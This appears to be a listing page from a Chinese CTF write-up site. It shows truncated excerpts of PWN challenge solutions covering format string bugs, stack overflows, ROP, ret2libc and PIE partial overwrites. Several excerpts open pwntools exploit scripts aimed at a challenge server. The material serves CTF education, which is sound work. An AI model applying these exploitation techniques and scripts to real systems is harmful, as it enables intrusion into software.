-
0xPwn3_fmt
分析sub_401192(),其中的sprintf()是将格式化数据输到特定数组或变量中的函数,其参数顺序为:目标 --> 格式 --> 数据。参数1:输出目的地,该变量为全局变量,内存地址为0x404080参数2:buf= 格式化字符串模板,函数会解析buf内的内容,里面的%s、%x等都会被当作格式指令参数3:buf=填充数据简单翻译...
- PWN
- 15小时前
-
[TAMUctf - 2019] pwn2
分析main(),可以看到程序有一个栈溢出漏洞。并且会将用户或攻击者的输入当成参数传入select_func(),其中,strncpy()会将参数值拷贝0x1F字节。由于本题开启PIE的原因,所以简单的ROP无法完成跳转。通过动态调试可以看到,v3局部变量的内存地址似乎在print_flag()附近那这是否意味着,可以利用地址在同一内存页、高位地址不变的特点,只修改地址的低位,实现控制流劫持呢?即...
- PWN
- 1天前
-
Calling Convention 64 wp
通过分析vuln()可以发现题目有明显的栈溢出漏洞,并且设置了if判断语句,可以通过栈溢出和变量覆盖绕过分析win(),可以发现该函数也设置了相同的语句,不过通过栈溢出跳转到该函数时是直接判断,没有让用户输入,所以仅可设置一个payload。因为该题是64位下Linux可执行文件,所以在传递参数时,需要用寄存器传参payload=b"a"*(0x30-0x8)payload=b"a"*(0x30-...
- PWN
- 1天前
-
printf
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 7天前
-
str.vs.cstr
#CstringorC++string?##题目信息题目描述:>Whichdoyoulike,CstringorC++string?远程环境:```bashnc49.232.142.23013698```最终flag:```textCakeCTF{HW1:Remove\"call_me\"andsolveit/HW2:SetPIE+RELROandsolveit}```##程序保护对附件进行...
- PWN
- 22天前
-
瑞士军刀wp
这个命令没有回显
- PWN
- 1月前
-
[2020]0xGame-不会起名的废物
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 4月前
-
[2020]0xGame-该怎么起名呢
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 4月前
-
FlagMarket-WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 5月前
-
stronk boi
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- PWN
- 5月前
-
Win0x3
frompwnimport*host='49.232.142.230'port=10684p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)ret=rop.find_gadget(['ret']).addressp.recvuntil(b'challenge.')leak=int(p.recv(14),16)log.info(f"leak-->{h...
- PWN
- 6月前
-
EzWinner
frompwnimport*fromLibcSearcherimport*host='49.232.142.230'port=14187p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)p.recvuntil('wisely:')win=int(p.recv(14),16)success('win=%#x',win)main_addr=win-0x128...
- PWN
- 7月前
-
ret2libc
frompwnimport*host='49.232.142.230'port=10930p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')libc=ELF('./libc.so.6')main=elf.sym['main']rop=ROP(elf)rdi=rop.find_gadget(['poprdi']).addressre...
- PWN
- 7月前
-
rop64
frompwnimport*host='49.232.142.230'port=14014p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')rop=ROP(elf)offset=0x30-0x8rdi=rop.find_gadget(['poprdi','ret']).addressbinsh=next(elf.search('/...
- PWN
- 7月前
-
ret2text
frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...
- PWN
- 7月前
-
rop32
frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...
- PWN
- 7月前
-
babyfmt
frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...
- PWN
- 7月前
-
栈溢出
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 9月前
-
stack-wp
frompwnimport*host=''port= p=remote(host,port)#p=process('./pwn')elf=ELF('./pwn')rop=ROP('./pwn')ret=rop.find_gadget(['ret']).addressp.sendlineafter('name?\n','1')backdoor=elf.sym['shell']offset=...
- PWN
- 9月前
-
Calling Convention 64
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 11月前